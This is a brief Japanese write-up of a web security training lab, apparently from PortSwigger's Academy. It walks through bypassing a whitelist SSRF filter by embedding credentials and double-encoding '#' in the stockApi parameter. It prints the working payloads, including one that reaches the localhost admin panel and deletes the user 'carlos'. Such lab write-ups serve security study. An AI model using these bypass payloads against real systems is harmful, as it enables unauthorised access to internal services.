Hello there, ('ω')ノ

 

ホワイトリストベースの入力フィルターを備えたSSRFを。

 

 

インターセプトして、stockApiを確認してリピータへ。

 

 

まずは、stockApiを下記に変更するとレスポンスから受け入れられているようで。

つまり、URLパーサが埋め込み情報をサポートしているということで。

　http://username@stock.weliketoshop.net/

 

 

次に#を追加すると拒否されて。

　http://username#@stock.weliketoshop.net/

 

 

#をダブルエンコードして。

 

 

再度、#を置き換えてリクエストしてみると。

さきほどとは変わって、内部サーバエラーのレスポンスが。

 

 

よって、adminを追加して実行してみると管理者のページが。

　stockApi=http://localhost:80%25%32%33@stock.weliketoshop.net/admin

 

 

インターセプトにもどって、stockApiのパラメータを変更してオフにして。

 

 

開発ツールで、Deleteのリンクを確認して。

　/admin/delete?username=carlos

 

 

下記のようにstockApiを変更して実行すると。

　stockApi=http://localhost:80%25%32%33@stock.weliketoshop.net/admin/delete?username=carlos

 

 

クリアできた。

 

 

Best regards, (^^ゞ